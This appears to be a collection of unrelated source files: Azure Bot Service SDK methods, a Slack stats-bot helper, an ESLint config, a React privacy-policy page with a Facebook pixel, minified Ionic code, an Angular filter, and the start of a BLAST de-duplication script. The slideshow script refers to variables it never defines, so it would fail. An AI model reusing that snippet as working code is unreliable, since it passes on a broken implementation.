update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.BotService/botServices/{resourceName}/Connections/{connectionName}'} # type: ignore
def get(
self,
resource_group_name, # type: str
resource_name, # type: str
connection_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.ConnectionSetting"
"""Get a Connection Setting registration for a Bot Service.
:param resource_group_name: The name of the Bot resource group in the user subscription.
:type resource_group_name: str
:param resource_name: The name of the Bot resource.
:type resource_name: str
:param connection_name: The name of the Bot Service Connection Setting resource.
:type connection_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ConnectionSetting, or the result of cls(response)
:rtype: ~azure.mgmt.botservice.models.ConnectionSetting
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ConnectionSetting"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-02"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=64, min_length=2, pattern=r'^[a-zA-Z0-9][a-zA-Z0-9_.-]*$'),
'resourceName': self._serialize.url("resource_name", resource_name, 'str', max_length=64, min_length=2, pattern=r'^[a-zA-Z0-9][a-zA-Z0-9_.-]*$'),
'connectionName': self._serialize.url("connection_name", connection_name, 'str', max_length=64, min_length=2, pattern=r'^[a-zA-Z0-9][\sa-zA-Z0-9_.-]*$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('ConnectionSetting', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.BotService/botServices/{resourceName}/Connections/{connectionName}'} # type: ignore
def delete(
self,
resource_group_name, # type: str
resource_name, # type: str
connection_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
"""Deletes a Connection Setting registration for a Bot Service.
:param resource_group_name: The name of the Bot resource group in the user subscription.
:type resource_group_name: str
:param resource_name: The name of the Bot resource.
:type resource_name: str
:param connection_name: The name of the Bot Service Connection Setting resource.
:type connection_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-02"
accept = "application/json"
# Construct URL
url = self.delete.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=64, min_length=2, pattern=r'^[a-zA-Z0-9][a-zA-Z0-9_.-]*$'),
'resourceName': self._serialize.url("resource_name", resource_name, 'str', max_length=64, min_length=2, pattern=r'^[a-zA-Z0-9][a-zA-Z0-9_.-]*$'),
'connectionName': self._serialize.url("connection_name", connection_name, 'str', max_length=64, min_length=2, pattern=r'^[a-zA-Z0-9][\sa-zA-Z0-9_.-]*$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.BotService/botServices/{resourceName}/Connections/{connectionName}'} # type: ignore
def list_by_bot_service(
self,
resource_group_name, # type: str
resource_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.ConnectionSettingResponseList"]
"""Returns all the Connection Settings registered to a particular BotService resource.
:param resource_group_name: The name of the Bot resource group in the user subscription.
:type resource_group_name: str
:param resource_name: The name of the Bot resource.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ConnectionSettingResponseList or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.botservice.models.ConnectionSettingResponseList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ConnectionSettingResponseList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-02"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_bot_service.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=64, min_length=2, pattern=r'^[a-zA-Z0-9][a-zA-Z0-9_.-]*$'),
'resourceName': self._serialize.url("resource_name", resource_name, 'str', max_length=64, min_length=2, pattern=r'^[a-zA-Z0-9][a-zA-Z0-9_.-]*$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('ConnectionSettingResponseList', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(_models.Error, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_bot_service.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.BotService/botServices/{resourceName}/connections'} # type: ignore
|
//Contains the Javascript necessary to make the slideshow operate (Side note: Finally, single line comments!!)
//The best part is this code does not rely on jQuery being installed
//Code from http://themarklee.com/2013/12/26/simple-diy-responsive-slideshow-made-html5-css3-javascript/
(function(document){ //Apply the slideshow functions to the document itself
var goldCounter = 0, //Keeps track of which slide you are on
$goldItems = document.querySelectorAll('.goldSlides figure'),
numgoldItems = $goldItems.length; //# of images to display
var showCurrent = function(){
var goldItemToShow = Math.abs(counter%numGoldItems); //Determines the slide that should be shown currently
[].forEach.call( $items, function(el){ //Iterates through all the slides and removes "show"
el.classList.remove('show'); //Essentially hides all images from view
});
$items[goldItemToShow].classList.add('show'); //Displays the current slide
};
document.querySelector('.next').addEventListener('click', function() {
goldCounter++; //The "next" arrows increment the slide number
showCurrent(); //Now show that slide
}, false);
document.querySelector('.prev').addEventListener('click', function() {
goldCounter--; //The "previous" arrows decrement the slide number
showCurrent(); //Now show that slide
}, false);
})(document);
|
const fetch = require('node-fetch')
exports.ERROR_MESSAGE = {
response_type: 'ephemeral',
text:
':x: Something went wrong with your request. Please try again and if the error persists, post a message at <#C319P09PB>.', // move to Parameter Store so it can be used for all generic errors?
}
exports.HELP_BLOCK = {
response_type: 'ephemeral',
blocks: [
{
type: 'section',
text: {
type: 'mrkdwn',
text:
'Using the `/osmcha-stats` command, you can get stats on changesets based on either a project ID or hashtags:',
},
},
{
type: 'section',
text: {
type: 'mrkdwn',
text:
':small_blue_diamond: `/osmcha-stats [projectID]` for stats on changesets of a Tasking Manager project (e.g. `/osmcha-stats 8172`)',
},
},
{
type: 'section',
text: {
type: 'mrkdwn',
text:
':small_blue_diamond: `/osmcha-stats [hashtags]` for stats on changesets with specific hashtags. Separate multiple hashtags with a space (e.g. `/osmcha-stats #hotosm-project-8386 #HOTPH`)',
},
},
{
type: 'section',
text: {
type: 'mrkdwn',
text:
':small_red_triangle: Note that when filtering using hashtags, the hashtags must be in the same order as listed in the changesets.',
},
},
{
type: 'section',
text: {
type: 'mrkdwn',
text:
':small_red_triangle: For best results, input as many hashtags as you can to filter the changesets more precisely. If the changeset data is too big, we would not be able to present them here.',
},
},
{
type: 'section',
text: {
type: 'mrkdwn',
text: 'If you need more help, post a message at <#C319P09PB>',
},
},
],
}
const groupFlagsIntoSections = (flags, size) => {
const flagsArray = []
for (let i = 0; i < flags.length; i++) {
const lastFlag = flagsArray[flagsArray.length - 1]
if (!lastFlag || lastFlag.length === size) {
flagsArray.push([flags[i]])
} else {
lastFlag.push(flags[i])
}
}
return flagsArray.map((flag) => {
return {
type: 'section',
fields: flag,
}
})
}
exports.createBlock = (
filterDescriptor,
changesetCount,
changesetFlags,
suspectChangesetCount
) => {
if (changesetCount === 0) {
const noChangesetBlock = {
response_type: 'ephemeral',
text:
`:x: There are *${changesetCount} changesets* under ${filterDescriptor}.\n` +
'Use the `/osmcha-stats help` command for help on using this command.',
}
return noChangesetBlock
}
const ARRAY_COUNT = 4
const suspectChangesetPercentage = Math.round(
(suspectChangesetCount / changesetCount) * 100
)
const flagArray = changesetFlags.reduce((accumulator, flag) => {
if (flag.changesets !== 0) {
accumulator.push({
type: 'mrkdwn',
text: `*${flag.name}*: ${flag.changesets.toLocaleString()}`,
})
}
return accumulator
}, [])
const flagSections = groupFlagsIntoSections(flagArray, ARRAY_COUNT)
const messageBlock = {
response_type: 'ephemeral',
blocks: [
{
type: 'section',
text: {
type: 'mrkdwn',
text: `:page_with_curl: There are *${changesetCount.toLocaleString()} changesets* under ${filterDescriptor}.`,
},
},
{
type: 'section',
text: {
type: 'mrkdwn',
text: `:warning: *${suspectChangesetCount.toLocaleString()} or ${suspectChangesetPercentage}% of changesets* have been flagged as suspicious.\n:small_red_triangle: Here is the breakdown of flags: :small_red_triangle_down:`,
},
},
...flagSections,
],
}
return messageBlock
}
exports.sendToSlack = (responseURL, message) => {
return fetch(responseURL, {
method: 'post',
body: JSON.stringify(message),
headers: {
'Content-Type': 'application/json',
},
})
}
|
module.exports = {
root: true,
parser: '@typescript-eslint/parser',
extends: [
'yoctol-base',
'plugin:@typescript-eslint/recommended',
'prettier',
'prettier/@typescript-eslint',
],
env: {
node: true,
jest: true,
jasmine: true,
},
plugins: ['@typescript-eslint', 'eslint-plugin-tsdoc'],
rules: {
camelcase: 'off',
'no-useless-constructor': 'off',
'import/no-extraneous-dependencies': 'off',
'import/extensions': 'off',
'@typescript-eslint/no-useless-constructor': 'error',
'@typescript-eslint/no-namespace': 'off',
'@typescript-eslint/camelcase': 'off',
'@typescript-eslint/ban-ts-comment': 'off',
'@typescript-eslint/ban-types': 'warn',
},
overrides: [
{
files: ['examples/**/*.js'],
rules: {
'@typescript-eslint/no-var-requires': 'off',
},
},
{
files: ['packages/**/*.ts'],
rules: {
'tsdoc/syntax': 'warn',
},
},
],
settings: {
'import/resolver': {
node: {
extensions: ['.js', '.jsx', '.ts', '.tsx'],
},
typescript: {},
},
},
};
|
/* eslint-disable max-len */
import React, { useEffect } from 'react';
import { Segment } from 'semantic-ui-react';
import ReactPixel from 'react-facebook-pixel';
export const PrivacyPolicy = () => {
useEffect(() => {
ReactPixel.init('898969540474999');
ReactPixel.pageView();
});
return (
<Segment secondary style={{ paddingBottom: 30, marginBottom: 10 }}>
<h1>Privacy Policy</h1>
<p>Effective date: March 28, 2019</p>
<p>Vitaes ("us", "we", or "our") operates the https://vitaes.io website (hereinafter referred to as the "Service").</p>
<p>This page informs you of our policies regarding the collection, use and disclosure of personal data when you use our Service and the choices you have associated with that data.</p>
<p>We use your data to provide and improve the Service. By using the Service, you agree to the collection and use of information in accordance with this policy. Unless otherwise defined in this Privacy Policy, the terms used in this Privacy Policy have the same meanings as in our Terms and Conditions, accessible from https://vitaes.io</p>
<h2>Definitions</h2>
<ul>
<li>
<p><strong>Service</strong></p>
<p>Service is the https://vitaes.io website operated by Vitaes</p>
</li>
<li>
<p><strong>Personal Data</strong></p>
<p>Personal Data means data about a living individual who can be identified from those data (or from those and other information either in our possession or likely to come into our possession).</p>
</li>
<li>
<p><strong>Usage Data</strong></p>
<p>Usage Data is data collected automatically either generated by the use of the Service or from the Service infrastructure itself (for example, the duration of a page visit).</p>
</li>
<li>
<p><strong>Cookies</strong></p>
<p>Cookies are small files stored on your device (computer or mobile device).</p>
</li>
<li>
<p><strong>Data Controller</strong></p>
<p>Data Controller means the natural or legal person who (either alone or jointly or in common with other persons) determines the purposes for which and the manner in which any personal information are, or are to be, processed.</p>
<p>For the purpose of this Privacy Policy, we are a Data Controller of your Personal Data.</p>
</li>
<li>
<p><strong>Data Processors (or Service Providers)</strong></p>
<p>Data Processor (or Service Provider) means any natural or legal person who processes the data on behalf of the Data Controller.</p>
<p>We may use the services of various Service Providers in order to process your data more effectively.</p>
</li>
<li>
<p><strong>Data Subject (or User)</strong></p>
<p>Data Subject is any living individual who is using our Service and is the subject of Personal Data.</p>
</li>
</ul>
<h2>Information Collection and Use</h2>
<p>We collect several different types of information for various purposes to provide and improve our Service to you.</p>
<h3>Types of Data Collected</h3>
<h4>Personal Data</h4>
<p>While using our Service, we may ask you to provide us with certain personally identifiable information that can be used to contact or identify you ("Personal Data"). Personally identifiable information may include, but is not limited to:</p>
<ul>
<li>Email address</li>
<li>First name and last name</li>
<li>Phone number</li>
<li>Address, State, Province, ZIP/Postal code, City</li>
<li>Cookies and Usage Data</li>
</ul>
<h4>Usage Data</h4>
<p>We may also collect information on how the Service is accessed and used ("Usage Data"). This Usage Data may include information such as your computer's Internet Protocol address (e.g. IP address), browser type, browser version, the pages of our Service that you visit, the time and date of your visit, the time spent on those pages, unique device identifiers and other diagnostic data.</p>
<h4>Tracking & Cookies Data</h4>
<p>We use cookies and similar tracking technologies to track the activity on our Service and we hold certain information.</p>
<p>Cookies are files with a small amount of data which may include an anonymous unique identifier. Cookies are sent to your browser from a website and stored on your device. Other tracking technologies are also used such as beacons, tags and scripts to collect and track information and to improve and analyse our Service.</p>
<p>You can instruct your browser to refuse all cookies or to indicate when a cookie is being sent. However, if you do not accept cookies, you may not be able to use some portions of our Service.</p>
<p>Examples of Cookies we use:</p>
<ul>
<li>
<strong>Session Cookies.</strong>
{' '}
We use Session Cookies to operate our Service.
</li>
<li>
<strong>Preference Cookies.</strong>
{' '}
We use Preference Cookies to remember your preferences and various settings.
</li>
<li>
<strong>Security Cookies.</strong>
{' '}
We use Security Cookies for security purposes.
</li>
</ul>
<h2>Use of Data</h2>
<p>Vitaes uses the collected data for various purposes:</p>
<ul>
<li>To provide and maintain our Service</li>
<li>To notify you about changes to our Service</li>
<li>To allow you to participate in interactive features of our Service when you choose to do so</li>
<li>To provide customer support</li>
<li>To gather analysis or valuable information so that we can improve our Service</li>
<li>To monitor the usage of our Service</li>
<li>To detect, prevent and address technical issues</li>
</ul>
<h2>Legal Basis for Processing Personal Data under the General Data Protection Regulation (GDPR)</h2>
<p>If you are from the European Economic Area (EEA), Vitaes legal basis for collecting and using the personal information described in this Privacy Policy depends on the Personal Data we collect and the specific context in which we collect it.</p>
<p>Vitaes may process your Personal Data because:</p>
<ul>
<li>We need to perform a contract with you</li>
<li>You have given us permission to do so</li>
<li>The processing is in our legitimate interests and it is not overridden by your rights</li>
<li>To comply with the law</li>
</ul>
<h2>Retention of Data</h2>
<p>Vitaes will retain your Personal Data only for as long as is necessary for the purposes set out in this Privacy Policy. We will retain and use your Personal Data to the extent necessary to comply with our legal obligations (for example, if we are required to retain your data to comply with applicable laws), resolve disputes and enforce our legal agreements and policies.</p>
<p>Vitaes will also retain Usage Data for internal analysis purposes. Usage Data is generally retained for a shorter period of time, except when this data is used to strengthen the security or to improve the functionality of our Service, or we are legally obligated to retain this data for longer periods.</p>
<h2>Transfer of Data</h2>
<p>Your information, including Personal Data, may be transferred to - and maintained on - computers located outside of your state, province, country or other governmental jurisdiction where the data protection laws may differ from those of your jurisdiction.</p>
<p>If you are located outside Brazil and choose to provide information to us, please note that we transfer the data, including Personal Data, to Brazil and process it there.</p>
<p>Your consent to this Privacy Policy followed by your submission of such information represents your agreement to that transfer.</p>
<p>Vitaes will take all the steps reasonably necessary to ensure that your data is treated securely and in accordance with this Privacy Policy and no transfer of your Personal Data will take place to an organisation or a country unless there are adequate controls in place including the security of your data and other personal information.</p>
<h2>Disclosure of Data</h2>
<h3>Legal Requirements</h3>
<p>Vitaes may disclose your Personal Data in the good faith belief that such action is necessary to:</p>
<ul>
<li>To comply with a legal obligation</li>
<li>To protect and defend the rights or property of Vitaes</li>
<li>To prevent or investigate possible wrongdoing in connection with the Service</li>
<li>To protect the personal safety of users of the Service or the public</li>
<li>To protect against legal liability</li>
</ul>
<h2>Security of Data</h2>
<p>The security of your data is important to us but remember that no method of transmission over the Internet or method of electronic storage is 100% secure. While we strive to use commercially acceptable means to protect your Personal Data, we cannot guarantee its absolute security.</p>
<h2>Our Policy on "Do Not Track" Signals under the California Online Protection Act (CalOPPA)</h2>
<p>We do not support Do Not Track ("DNT"). Do Not Track is a preference you can set in your web browser to inform websites that you do not want to be tracked.</p>
<p>You can enable or disable Do Not Track by visiting the Preferences or Settings page of your web browser.</p>
<h2>Your Data Protection Rights under the General Data Protection Regulation (GDPR)</h2>
<p>If you are a resident of the European Economic Area (EEA), you have certain data protection rights. Vitaes aims to take reasonable steps to allow you to correct, amend, delete or limit the use of your Personal Data.</p>
<p>If you wish to be informed about what Personal Data we hold about you and if you want it to be removed from our systems, please contact us.</p>
<p>In certain circumstances, you have the following data protection rights:</p>
<ul>
<li>
<p>
<strong>The right to access, update or delete the information we have on you.</strong>
{' '}
Whenever made possible, you can access, update or request deletion of your Personal Data directly within your account settings section. If you are unable to perform these actions yourself, please contact us to assist you.
</p>
</li>
<li>
<p>
<strong>The right of rectification.</strong>
{' '}
You have the right to have your information rectified if that information is inaccurate or incomplete.
</p>
</li>
<li>
<p>
<strong>The right to object.</strong>
{' '}
You have the right to object to our processing of your Personal Data.
</p>
</li>
<li>
<p>
<strong>The right of restriction.</strong>
{' '}
You have the right to request that we restrict the processing of your personal information.
</p>
</li>
<li>
<p>
<strong>The right to data portability.</strong>
{' '}
You have the right to be provided with a copy of the information we have on you in a structured, machine-readable and commonly used format.
</p>
</li>
<li>
<p>
<strong>The right to withdraw consent.</strong>
{' '}
You also have the right to withdraw your consent at any time where Vitaes relied on your consent to process your personal information.
</p>
</li>
</ul>
<p>Please note that we may ask you to verify your identity before responding to such requests.</p>
<p>You have the right to complain to a Data Protection Authority about our collection and use of your Personal Data. For more information, please contact your local data protection authority in the European Economic Area (EEA).</p>
<h2>Service Providers</h2>
<p>We may employ third party companies and individuals to facilitate our Service ("Service Providers"), provide the Service on our behalf, perform Service-related services or assist us in analysing how our Service is used.</p>
<p>These third parties have access to your Personal Data only to perform these tasks on our behalf and are obligated not to disclose or use it for any other purpose.</p>
<h2>Links to Other Sites</h2>
<p>Our Service may contain links to other sites that are not operated by us. If you click a third party link, you will be directed to that third party's site. We strongly advise you to review the Privacy Policy of every site you visit.</p>
<p>We have no control over and assume no responsibility for the content, privacy policies or practices of any third party sites or services.</p>
<h2>Changes to This Privacy Policy</h2>
<p>We may update our Privacy Policy from time to time. We will notify you of any changes by posting the new Privacy Policy on this page.</p>
<p>We will let you know via email and/or a prominent notice on our Service, prior to the change becoming effective and update the "effective date" at the top of this Privacy Policy.</p>
<p>You are advised to review this Privacy Policy periodically for any changes. Changes to this Privacy Policy are effective when they are posted on this page.</p>
<h2>Contact Us</h2>
<p>If you have any questions about this Privacy Policy, please contact us:</p>
<ul>
<li>By email: latache@vitaes.io</li>
</ul>
</Segment>
);
};
export default PrivacyPolicy;
|
(window.webpackJsonp=window.webpackJsonp||[]).push([[29],{"3N3H":function(e,n,t){"use strict";t.r(n),t.d(n,"IonLoading",function(){return p}),t.d(n,"IonLoadingController",function(){return m});var i=t("B5Ai"),o=t("cBjU"),r=t("dYSE"),a=t("d6Vy");function s(e,n){var t=new e,i=new e;i.addElement(n.querySelector("ion-backdrop"));var o=new e;return o.addElement(n.querySelector(".loading-wrapper")),i.fromTo("opacity",.01,.3),o.fromTo("opacity",.01,1).fromTo("scale",1.1,1),Promise.resolve(t.addElement(n).easing("ease-in-out").duration(200).add(i).add(o))}function d(e,n){var t=new e,i=new e;i.addElement(n.querySelector("ion-backdrop"));var o=new e;return o.addElement(n.querySelector(".loading-wrapper")),i.fromTo("opacity",.3,0),o.fromTo("opacity",.99,0).fromTo("scale",1,.9),Promise.resolve(t.addElement(n).easing("ease-in-out").duration(200).add(i).add(o))}function c(e,n){var t=new e,i=new e;i.addElement(n.querySelector("ion-backdrop"));var o=new e;return o.addElement(n.querySelector(".loading-wrapper")),i.fromTo("opacity",.01,.32),o.fromTo("opacity",.01,1).fromTo("scale",1.1,1),Promise.resolve(t.addElement(n).easing("ease-in-out").duration(200).add(i).add(o))}function l(e,n){var t=new e,i=new e;i.addElement(n.querySelector("ion-backdrop"));var o=new e;return o.addElement(n.querySelector(".loading-wrapper")),i.fromTo("opacity",.32,0),o.fromTo("opacity",.99,0).fromTo("scale",1,.9),Promise.resolve(t.addElement(n).easing("ease-in-out").duration(200).add(i).add(o))}var p=function(){function e(){this.presented=!1,this.keyboardClose=!0,this.duration=0,this.backdropDismiss=!1,this.showBackdrop=!0,this.translucent=!1,this.animated=!0}return e.prototype.componentWillLoad=function(){void 0===this.spinner&&(this.spinner=this.config.get("loadingSpinner",this.config.get("spinner","ios"===this.mode?"lines":"crescent")))},e.prototype.onBackdropTap=function(){this.dismiss(void 0,r.a)},e.prototype.present=function(){return i.a(this,void 0,void 0,function(){var e=this;return i.c(this,function(n){switch(n.label){case 0:return[4,Object(r.c)(this,"loadingEnter",s,c,void 0)];case 1:return n.sent(),this.duration>0&&(this.durationTimeout=setTimeout(function(){return e.dismiss()},this.duration+10)),[2]}})})},e.prototype.dismiss=function(e,n){return this.durationTimeout&&clearTimeout(this.durationTimeout),Object(r.d)(this,e,n,"loadingLeave",d,l)},e.prototype.onDidDismiss=function(){return Object(r.e)(this.el,"ionLoadingDidDismiss")},e.prototype.onWillDismiss=function(){return Object(r.e)(this.el,"ionLoadingWillDismiss")},e.prototype.hostData=function(){var e;return{style:{zIndex:4e4+this.overlayIndex},class:Object.assign({},Object(a.a)(this.cssClass),(e={},e[""+this.mode]=!0,e["loading-translucent"]=this.translucent,e))}},e.prototype.render=function(){return[Object(o.b)("ion-backdrop",{visible:this.showBackdrop,tappable:this.backdropDismiss}),Object(o.b)("div",{class:"loading-wrapper",role:"dialog"},this.spinner&&Object(o.b)("div",{class:"loading-spinner"},Object(o.b)("ion-spinner",{name:this.spinner})),this.message&&Object(o.b)("div",{class:"loading-content"},this.message))]},Object.defineProperty(e,"is",{get:function(){return"ion-loading"},enumerable:!0,configurable:!0}),Object.defineProperty(e,"encapsulation",{get:function(){return"scoped"},enumerable:!0,configurable:!0}),Object.defineProperty(e,"properties",{get:function(){return{animated:{type:Boolean,attr:"animated"},backdropDismiss:{type:Boolean,attr:"backdrop-dismiss"},config:{context:"config"},cssClass:{type:String,attr:"css-class"},dismiss:{method:!0},duration:{type:Number,attr:"duration"},el:{elementRef:!0},enterAnimation:{type:"Any",attr:"enter-animation"},keyboardClose:{type:Boolean,attr:"keyboard-close"},leaveAnimation:{type:"Any",attr:"leave-animation"},message:{type:String,attr:"message"},mode:{type:String,attr:"mode"},onDidDismiss:{method:!0},onWillDismiss:{method:!0},overlayIndex:{type:Number,attr:"overlay-index"},present:{method:!0},showBackdrop:{type:Boolean,attr:"show-backdrop"},spinner:{type:String,attr:"spinner",mutable:!0},translucent:{type:Boolean,attr:"translucent"}}},enumerable:!0,configurable:!0}),Object.defineProperty(e,"events",{get:function(){return[{name:"ionLoadingDidPresent",method:"didPresent",bubbles:!0,cancelable:!0,composed:!0},{name:"ionLoadingWillPresent",method:"willPresent",bubbles:!0,cancelable:!0,composed:!0},{name:"ionLoadingWillDismiss",method:"willDismiss",bubbles:!0,cancelable:!0,composed:!0},{name:"ionLoadingDidDismiss",method:"didDismiss",bubbles:!0,cancelable:!0,composed:!0}]},enumerable:!0,configurable:!0}),Object.defineProperty(e,"listeners",{get:function(){return[{name:"ionBackdropTap",method:"onBackdropTap"}]},enumerable:!0,configurable:!0}),Object.defineProperty(e,"style",{get:function(){return".sc-ion-loading-md-h{--min-width:auto;--width:auto;--min-height:auto;--height:auto;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;left:0;right:0;top:0;bottom:0;display:-ms-flexbox;display:flex;position:fixed;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;font-family:var(--ion-font-family,inherit);contain:strict;-ms-touch-action:none;touch-action:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;z-index:1000}.overlay-hidden.sc-ion-loading-md-h{display:none}.loading-wrapper.sc-ion-loading-md{display:-ms-flexbox;display:flex;-ms-flex-align:inherit;align-items:inherit;-ms-flex-pack:inherit;justify-content:inherit;width:var(--width);min-width:var(--min-width);max-width:var(--max-width);height:var(--height);min-height:var(--min-height);max-height:var(--max-height);background:var(--background);opacity:0;z-index:10}.spinner-bubbles.sc-ion-loading-md, .spinner-circles.sc-ion-loading-md, .spinner-crescent.sc-ion-loading-md, .spinner-dots.sc-ion-loading-md, .spinner-lines.sc-ion-loading-md, .spinner-lines-small.sc-ion-loading-md{color:var(--spinner-color)}.sc-ion-loading-md-h{--background:var(--ion-color-step-50,#f2f2f2);--max-width:280px;--max-height:90%;--spinner-color:var(--ion-color-primary,#3880ff);color:var(--ion-color-step-850,#262626);font-size:14px}.loading-wrapper.sc-ion-loading-md{border-radius:2px;padding-left:24px;padding-right:24px;padding-top:24px;padding-bottom:24px;-webkit-box-shadow:0 16px 20px rgba(0,0,0,.4);box-shadow:0 16px 20px rgba(0,0,0,.4)}@supports ((-webkit-margin-start:0) or (margin-inline-start:0)) or (-webkit-margin-start:0){.loading-wrapper.sc-ion-loading-md{padding-left:unset;padding-right:unset;-webkit-padding-start:24px;padding-inline-start:24px;-webkit-padding-end:24px;padding-inline-end:24px}}.loading-spinner.sc-ion-loading-md + .loading-content.sc-ion-loading-md{margin-left:16px}@supports ((-webkit-margin-start:0) or (margin-inline-start:0)) or (-webkit-margin-start:0){.loading-spinner.sc-ion-loading-md + .loading-content.sc-ion-loading-md{margin-left:unset;-webkit-margin-start:16px;margin-inline-start:16px}}"},enumerable:!0,configurable:!0}),Object.defineProperty(e,"styleMode",{get:function(){return"md"},enumerable:!0,configurable:!0}),e}(),m=function(){function e(){}return e.prototype.create=function(e){return Object(r.f)(this.doc.createElement("ion-loading"),e)},e.prototype.dismiss=function(e,n,t){return Object(r.g)(this.doc,e,n,"ion-loading",t)},e.prototype.getTop=function(){return i.a(this,void 0,void 0,function(){return i.c(this,function(e){return[2,Object(r.h)(this.doc,"ion-loading")]})})},Object.defineProperty(e,"is",{get:function(){return"ion-loading-controller"},enumerable:!0,configurable:!0}),Object.defineProperty(e,"properties",{get:function(){return{create:{method:!0},dismiss:{method:!0},doc:{context:"document"},getTop:{method:!0}}},enumerable:!0,configurable:!0}),e}()}}]);
|
app.filter("initcap",function(){
return function(value){
return value.charAt(0).toUpperCase() + value.substring(1);
}
})
|
#!/bin/env python
"""
Created on Tues Aug 14 8:59:11 2018
@author: francinecamacho
"""
"""This script takes in a BLAST tabular output file: a fasta file used to BLAST against itself to parse out the
duplicated clusters, proteins or genes from the fasta file. Assumption is that the BLAST tabular file is run with
--perc_identity parameter in BLAST. This is necessary for BLAST to calculate the query coverage on hits that passed
with the desired percent identity. The output is the de-replicated fasta file, and a text file with the unique cluster,
proteins or gene names."""
from Bio import SeqIO
import pandas as pd
import networkx as nx
import os
#Function to make a panda data frame to iterate our BLAST tabular file output.
def makeDataFrame(PATH, tabularHeader, coverageCutOff, perc_identity):
names = tabularHeader.split(" ")
dataframe = pd.read_csv(PATH, sep="\t", names=names, header=None)
# filter dataframe to just have hits that meet qcovs threshold and pident threshold and qseqid are not identical to sseqid
filteredDF = dataframe[(dataframe.sseqid != dataframe.qseqid) & (dataframe.qcovs >= coverageCutOff) &
(dataframe.pident >= perc_identity)]
uniqueQID = dataframe['qseqid'].unique() # retrieve list of unique queries
print("Number of inputted BGCs:", len(uniqueQID))
return uniqueQID, filteredDF
def makeLengthDict(df):
resultDict = {}
for index, row in df.iterrows():
queryName = df.at[index, 'qseqid']
